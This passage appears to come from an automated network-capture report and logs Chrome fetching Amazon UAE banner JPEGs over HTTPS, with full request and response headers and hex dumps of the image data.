                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 01 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 09 0a 07 08 02 05 06 04 03 01 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 06 07 08 05 09 01 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 92 01 ec c6 37 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIFt"67
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1378INData Raw: 5a 24 6e 98 ea 42 1d 0f 63 6b 89 0f c1 c0 cf a7 f8 ae e8 da 74 5c 37 31 fa c3 7a d2 09 90 a6 5b c8 b9 24 c0 25 dd cc 39 3b 2e 59 a4 bf 0b 80 68 88 1e e8 c7 ce d0 8e 3d e3 c3 2b 32 e2 e5 9a 2d b9 4b 9e 50 c1 4a b0 60 cc 92 f2 89 79 81 ac 05 da e0 08 06 ba af 57 27 33 95 82 d7 83 6d 1c d3 2e 82 05 d9 e2 33 f6 b8 8f 3a 3b b4 72 d3 06 76 32 64 d4 b7 25 32 26 49 82 68 50 23 d9 a8 06 c2 0b 9c 2e 03 04 36 53 45 ae 33 7b 9b 27 e0 85 af 17 7d 79 c7 78 93 69 99 24 9c 84 e5 53 1d c9 b3 25 5b 24 81 78 54 37 84 34 f1 d0 14 41 37 34 c5 34 53 99 b9 3c 63 de eb 6f 64 39 ec e3 ba ab db 2c 98 92 97 23 90 64 ab 6a a3 f7 08 da 42 17 0f 9d 79 4d 48 35 e7 a3 10 0f 67 83 3a 0c e7 68 f7 1b 51 de 4d 79 b6 e4 23 82 17 b4 4b 2d 40 bc 56 11 a9 09 29 1f 53 d5 13 c0 9f 55 c7 d5 75 38
                                                                                                                                                                                                                                                                Data Ascii: Z$nBckt\71z[$%9;.Yh=+2-KPJ`yW'3m.3:;rv2d%2&IhP#.6SE3{'}yxi$S%[$xT74A744S<cod9,#djByMH5g:hQMy#K-@V)SUu8
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1103INData Raw: 97 ac 77 96 55 22 7c af 6f 08 c6 d9 24 09 f2 36 54 81 32 ce 98 c7 c3 da b6 55 86 db ca fb 8a c8 00 0d 1b dc c9 21 0f b8 9f ff c4 00 34 11 00 01 02 04 05 01 05 07 03 05 00 00 00 00 00 00 01 02 11 03 04 05 06 00 07 12 21 31 41 08 14 30 51 91 13 15 22 32 34 40 61 35 36 42 72 81 a1 b1 d1 ff da 00 08 01 02 01 01 3f 00 fb 02 42 41 52 8e 90 03 92 76 00 0d dd f1 9b bd a0 2a 46 a5 1e d2 b1 10 4a 9f bb 54 2b a9 dc bb 8f a0 03 72 5c 36 ac 53 67 73 c2 c8 a4 4d 5e b5 3a 8d 5a 2d 20 04 ad 50 6b 45 2a 3a 54 76 74 12 4b 29 88 49 23 cd b1 95 d9 97 4f cc aa 32 a7 e5 de 4a 76 9e 53 02 a3 08 b3 05 00 09 29 24 fc 8a 50 2a 72 ec 4f 2c c9 1e 07 68 2b fa 2d a9 6b 9a 55 3d 60 d5 aa e9 32 c8 d2 58 a6 12 80 d4 a0 db ee cc fe 43 1d 9c 72 b6 14 c4 01 7c d7 21 fb 45 2d 60 d0 02 ff 00
                                                                                                                                                                                                                                                                Data Ascii: wU"|o$6T2U!4!1A0Q"24@a56Br?BARv*FJT+r\6SgsM^:Z- PkE*:TvtK)I#O2JvS)$P*rO,h+-kU=`2XCr|!E-`


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                83192.168.2.449944151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC704OUTGET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332323_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 4521
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: b2838d18-e75b-494e-bee9-fcb20f579677
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 08 Aug 2023 07:14:49 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Thu, 02 Jun 2044 08:08:31 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1234582
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:32 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100027-IAD, cache-nyc-kteb1890038-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 3a 00 01 00 00 06 03 01 01 00 00 00 00 00 00 00 00 00 00 03 06 07 08 09 0a 02 04 05 01 0b 01 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 07 08 05 06 01 04 09 02 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 c9 00 f6 62 9b 80 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIFt":b
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1378INData Raw: 4b 6e 8d dc e2 5a ba 03 07 5d 99 21 f3 da c7 45 24 0e 71 0f ef 3e 9d 11 10 5d 4a 34 7d 36 d7 e7 76 45 9f 8c 99 66 d9 19 52 c0 e2 89 59 6e 38 97 47 aa ac 3e 0f 17 da 49 a6 4a 2c 77 eb 10 c5 58 f4 2a ef 51 4a b7 a1 86 3d fc 51 00 2c 90 50 50 44 94 2e 9b 34 1d 91 a0 51 11 06 43 13 05 a0 41 c2 7f 0d 5a 5f 85 26 83 11 73 07 e9 c1 00 19 0d a5 b6 62 ba d5 6d 91 fb 57 f8 77 0c 9e 1a db 1b 34 6c 97 b4 64 ed b9 8b 73 29 9b c2 3d a5 af 7b 5d 83 e7 d4 ad b6 73 d8 95 aa 4b 9b ea 03 b8 07 5b f9 62 98 b0 cb af e8 f3 c5 c9 fa 38 ee b6 57 29 df 95 57 15 d9 b3 c7 ac 3b 3f c3 e1 b2 c5 d0 9a d6 db a6 d7 50 a5 cc 3a d9 a6 db 73 8d 9e 0a d6 c9 19 e7 93 da 8e 6a 91 20 cf 77 0e 2f fd 2e 17 d9 01 5d 05 ff 00 ec 6d de e6 4b a3 f3 7f 97 73 2b 95 96 c8 ca cc cd 4c da 9e 99 a4 d5 9a
                                                                                                                                                                                                                                                                Data Ascii: KnZ]!E$q>]J4}6vEfRYn8G>IJ,wX*QJ=Q,PPD.4QCAZ_&sbmWw4lds)={]sK[b8W)W;?P:sj w/.]mKs+L
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1378INData Raw: 3d 58 bc 13 9b 83 8c 66 db 9a a4 4e a4 58 90 92 a5 0d c2 b3 cd f6 fe 7e ba b8 55 53 0d 89 1e d5 68 a2 f4 c3 12 c7 0d ae 43 76 1c 85 d1 ee f2 dc a3 d1 4e a9 03 f1 90 9f 79 39 a2 1e aa b2 12 06 49 e8 99 0d 12 33 15 5d f0 71 a2 84 6b 32 ba cc aa aa af 8e ae ac 89 7a 83 4f 89 36 89 c9 e7 d2 33 92 4b a4 64 48 da bc 50 23 74 f1 da 48 90 4d 26 0e 7a 4f dd df 74 14 ed 80 b6 03 50 78 1e 4c e3 d8 68 72 72 35 1a 72 45 39 71 b7 54 1d dc 1f 6f 97 d1 02 1b e5 1d cd 76 bf 26 0c 10 f5 2a 20 3e 87 d3 27 cd 18 d0 fe f7 5b 7c 28 d1 18 53 4a 72 e4 af cf fc db 04 d0 72 7c e5 3d f7 40 bb 5d 6a ee 63 59 ed b1 b9 c8 6f 70 da f5 57 74 1a f6 6d 92 cd a4 ed 55 2e e8 e5 0b 35 30 dd 20 24 6b a1 ae 93 e9 12 49 91 5c 22 1d 12 6b 45 45 4d 8a 98 26 cb 34 ae b5 33 96 99 f0 6d a0 30 1c ee
                                                                                                                                                                                                                                                                Data Ascii: =XfNX~UShCvNy9I3]qk2zO63KdHP#tHM&zOtPxLhrr5rE9qTov&* >'[|(SJrr|=@]jcYopWtmU.50 $kI\"kEEM&43m0
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC387INData Raw: 9d e3 13 cb 2e 53 9d 92 ba b7 6c 59 83 c8 83 37 41 15 ac f8 4e 99 f3 14 8d 4e 84 b9 ba a9 7a 51 c4 28 27 e1 19 67 ef fb 7f 5d 9b c6 c5 82 8c 0d c6 9f a9 11 50 72 a0 20 47 d0 48 91 4b 92 a4 89 d3 4c d3 29 d4 8a 9b 31 a7 54 dc ca 91 b9 4b 81 34 14 99 ad 29 11 1d 88 30 ab 9b d3 62 c5 3b 01 7a e8 bf 22 e9 83 07 4a 5e d7 3d 2d 89 58 dc 70 f3 a2 a4 2e 22 f5 6f 1f 11 d6 4f 51 5f f9 1d 3b c0 49 03 99 8b 60 2c 26 1a 13 07 15 03 e6 cf da 0e 80 c1 11 d8 d8 9e eb 83 92 44 ea a2 29 35 1c c7 90 c8 db 09 a1 c2 98 c3 05 25 c2 29 d0 dc 6c 5a d7 74 06 eb f4 bb 37 be 11 24 df 9f 17 c5 7a 9d 24 5b 7d db ac ba b4 ac d8 81 0f 0d 26 f5 69 e2 17 72 33 35 8f 6c f2 05 5a 45 49 15 5e 4c a4 11 17 88 3a 41 1c e8 35 d2 99 fa 77 41 82 08 cc 19 16 c1 58 c0 2f 4a 12 2f 8e 2c 00 06 93 90
                                                                                                                                                                                                                                                                Data Ascii: .SlY7ANNzQ('g]Pr GHKL)1TK4)0b;z"J^=-Xp."oOQ_;I`,&D)5%)lZt7$z$[}&ir35lZEI^L:A5wAX/J/,


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                84192.168.2.449946151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC704OUTGET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332324_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 5427
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 92ff835b-cb5b-4647-8383-02f9c0e4a52d
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 08 Aug 2023 07:14:49 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Thu, 02 Jun 2044 08:08:31 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1547970
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:32 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000020-IAD, cache-nyc-kteb1890090-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 39 00 01 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 07 09 06 08 03 0a 01 04 05 02 01 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 06 07 05 08 01 03 09 04 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b2 01 ec c6 9b 80 00 00 03
                                                                                                                                                                                                                                                                Data Ascii: JFIFt"9
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1378INData Raw: 7a 4d c5 b6 b0 4e c6 fe cf 0d 9b 1a 31 db 5d 2d ba d9 0b 77 07 5a ef ad 8b aa f8 76 91 f5 ae ef 45 9a d4 86 57 c9 4f d1 87 cc a3 43 ac 96 d7 04 92 57 06 45 6d 3d 06 bb e8 91 be c5 3c 87 e5 34 3e ec f9 cc 80 a0 86 1a e0 d8 52 40 4d 12 0a 6e cf a0 9c 0f 7d a3 91 b1 f8 37 fe bd ff 00 af 15 eb a7 be e5 de e9 6a 36 8d e4 89 89 d6 ee 80 95 56 ec 4e 19 64 39 e7 ba 72 8c 7e 27 50 2a 5f e3 32 58 e7 2c e7 49 35 30 45 c6 ee 90 16 fe d0 37 93 0d f4 67 09 aa bb 0f 6e 55 70 70 91 61 f5 18 e9 c2 64 97 24 f1 5a b8 c2 62 02 a1 97 92 16 d3 e2 c8 d3 fa 47 22 31 e3 23 d9 af 7f 3d 31 84 89 5b 4c 78 39 f0 c1 f6 b4 5b 95 12 47 97 b1 1e 9e dc c1 d9 ea fe 14 10 f5 7e 06 91 63 1d 5f ee e3 b1 7c 21 70 e5 78 89 75 92 b8 b3 9e f3 65 0e c8 cf d9 ba 75 ba a5 33 12 5e f2 45 06 45 d8 8a
                                                                                                                                                                                                                                                                Data Ascii: zMN1]-wZvEWOCWEm=<4>R@Mn}7j6VNd9r~'P*_2X,I50E7gnUppad$ZbG"1#=1[Lx9[G~c_|!pxueu3^EE
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1378INData Raw: 24 2d 7f 14 b2 38 67 cb f8 04 57 fb 77 e3 30 52 09 b2 44 82 44 aa 5e 7c 62 fb 16 b6 ab 73 c7 38 2e 5b d6 ed ac f8 aa 1d cb 19 c6 a7 22 57 df 10 37 c8 ab e1 fb 53 b5 3d 0a ae 58 3a e2 7e b3 8d 92 94 4a 1f 27 2e d7 37 37 9e 0e 65 59 22 62 98 93 32 df 7c 93 a4 2a b8 10 51 94 0b f8 3f 17 1d f7 ba cf da c5 f1 47 ac e0 63 e6 b8 78 3a e9 8e 22 c6 4a 25 03 7c d3 1c e0 b1 bc d9 36 46 e4 da 95 50 c1 cc 5e e1 49 20 1e c7 8c 2b 20 47 4d b1 7e ae ae d1 ea d6 30 db 9d c9 68 6b ac d7 9f c8 50 3f 4e 49 92 2f 95 1c a4 8c ab bb 1f 51 95 13 9c 23 bf 07 4a 29 fa 41 42 89 75 28 30 3b a0 b5 10 f5 30 70 31 f0 ca 0c 34 5b 31 8c bb 24 47 19 cc 91 c6 c8 fc dd 32 a9 3c a5 35 32 58 df 19 96 b2 cc c8 43 a6 b0 c4 1d 5e 34 56 08 7c dd 41 72 24 65 f8 43 76 3c 83 1b ee df 4d de 4a 34 64
                                                                                                                                                                                                                                                                Data Ascii: $-8gWw0RDD^|bs8.["W7S=X:~J'.77eY"b2|*Q?Gcx:"J%|6FP^I + GM~0hkP?NI/Q#J)ABu(0;0p14[1$G2<52XC^4V|Ar$eCv<MJ4d
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1293INData Raw: 28 b9 b8 36 98 f9 8f 99 e3 31 76 82 cf 51 95 f1 f0 30 2e 7b 98 32 b7 b1 c5 79 59 c4 49 c3 d2 f3 56 76 90 01 20 92 08 21 3a 6f 3c 53 e5 1c c5 55 9a 29 9c 9a 5c 5e 4a 52 99 58 92 a4 a5 22 e6 77 20 40 d8 81 c1 46 20 b2 96 b9 16 33 3b 8b 19 13 e7 c3 1b db d6 5c 70 a3 76 68 72 5b 65 40 20 94 85 a8 24 80 41 23 48 30 41 13 29 22 0c de 78 c8 19 98 67 0c ac d8 f8 48 d7 89 86 12 b2 2e 35 a5 20 2a dd 49 fc 10 3c 55 d5 18 14 74 55 75 38 c6 12 8c 1c 4c 73 36 b0 48 bc d8 0b 89 bf 41 c5 7f c4 66 37 67 87 7d ff 00 55 78 e3 7b 80 a2 00 1e 7c 7c 75 48 7a ee f5 6d 69 b1 b8 b5 bc b9 8b 1e 3b 35 0d 18 38 ca ad c0 6d 78 34 cd c9 5e 3e 62 94 95 25 40 a2 d2 22 c9 92 44 12 52 7d 4c 0a c7 34 54 56 2b 42 4a 51 a9 5a 01 1b 09 90 3f d4 72 80 00 8b 71 8f 8b 71 ea 3f 23 6f c1 e5 c7 b2
                                                                                                                                                                                                                                                                Data Ascii: (61vQ0.{2yYIVv !:o<SU)\^JRX"w @F 3;\pvhr[e@ $A#H0A)"xgH.5 *I<UtUu8Ls6HAf7g}Ux{||uHzmi;58mx4^>b%@"DR}L4TV+BJQZ?rqq?#o


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                85192.168.2.449948151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC704OUTGET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 5203
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: f1897c05-f795-44d9-a03b-2ec39760fe4b
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 08 Aug 2023 07:14:49 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Thu, 02 Jun 2044 08:08:31 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1575021
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:32 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000080-IAD, cache-ewr18130-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 39 00 01 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 08 09 05 07 01 06 02 03 04 0a 01 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 05 06 07 09 01 02 04 0a ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b2 01 b9 88 6e 00 00 00 1c
                                                                                                                                                                                                                                                                Data Ascii: JFIFt"9n
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1378INData Raw: 6d 10 66 d7 16 d8 32 9d d0 09 23 be 3d 51 68 05 fd af a2 87 37 90 1c 2b e4 5e 51 22 b7 6e 5f 93 23 86 fe 4f 55 b8 37 e4 44 b4 4e 2b 24 24 9f 80 f1 37 b1 55 d4 7d 9e 61 35 b8 02 76 5d f7 7e 3e 5f 2e 5f 76 ef 8e fb 70 89 4c f6 47 07 50 b8 4b 6c b8 ec e9 5f 5d ff 00 6f d7 e5 91 87 e8 85 91 d8 34 37 b8 d6 47 30 9f bd b8 38 ad 34 fe cf 88 11 ac ff 00 3b d9 ab fa 6f 43 69 29 ba b5 54 9e 71 18 ac 3d 8b 0f f7 84 80 b9 1e 8b 10 2f f0 d1 4b 4d 78 51 a6 6f dd 3a be 0a 9a c6 41 c5 da ef 65 b4 2a 76 43 f4 89 1a 32 d8 3b ab 51 5c 51 c3 1b 35 94 36 1c fe e4 82 e5 e5 61 20 19 97 c8 66 b9 2f c9 ca f6 fb b7 93 e9 dd d7 6c 5c e1 e2 e4 6d 91 8d 1e 95 ae 6e c5 dd 4b f7 57 d7 75 79 52 d8 46 3b b0 78 94 8b 37 5f 30 92 5c 3d 0e 25 ef 7e 19 48 8a fc f0 1e d4 e5 f2 53 0c 7b ca 00
                                                                                                                                                                                                                                                                Data Ascii: mf2#=Qh7+^Q"n_#OU7DN+$$7U}a5v]~>_._vpLGPKl_]o47G084;oCi)Tq=/KMxQo:Ae*vC2;Q\Q56a f/l\mnKWuyRF;x7_0\=%~HS{
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1378INData Raw: aa 67 6e 10 8c 4d cf a9 25 51 a4 b4 95 ac c0 9d 2b a7 35 52 0f 2a 34 4a a3 46 f9 24 04 0b c7 cb ea fd 91 da 85 e7 38 88 5d 51 cf 1a e6 05 e3 0f 3c 58 0b 00 80 5b 36 d5 ac c6 71 17 9c f3 c7 86 10 e6 f9 06 b0 cb 9d f5 a2 72 97 d6 9d b3 62 92 82 4f 39 b8 6b 3e 22 c7 f9 71 2d 50 ff 00 57 f2 7a 2f a3 2d 56 a6 f0 08 24 24 91 ba a3 e1 ac 7f 90 92 1d c7 88 10 ea 16 23 de 53 b1 ad 87 e0 33 f3 18 78 89 23 97 92 66 27 38 f4 a8 d0 ce 70 2e c4 84 7e 22 40 be 71 71 1d a7 a9 75 45 a1 d1 6a a3 43 a6 c4 ea 44 01 e1 36 32 93 2f b2 92 6b 22 05 ce 0f 9f f6 a0 89 40 b3 45 f9 df ff 00 22 0f 66 1a 4a 05 53 65 a3 67 c1 66 12 7c 18 62 2c 3f ce a8 e1 1e 22 03 db ab 0a f3 58 b5 42 9d 8e 7f 53 af 2f 5e fb 1d c0 6d 5a a9 ee 50 d0 42 b8 44 37 d4 46 71 4e 1f cb a8 e9 19 07 ab 5a c6 61
                                                                                                                                                                                                                                                                Data Ascii: gnM%Q+5R*4JF$8]Q<X[6qrbO9k>"q-PWz/-V$$#S3x#f'8p.~"@qquEjCD62/k"@E"fJSegf|b,?"XBS/^mZPBD7FqNZa
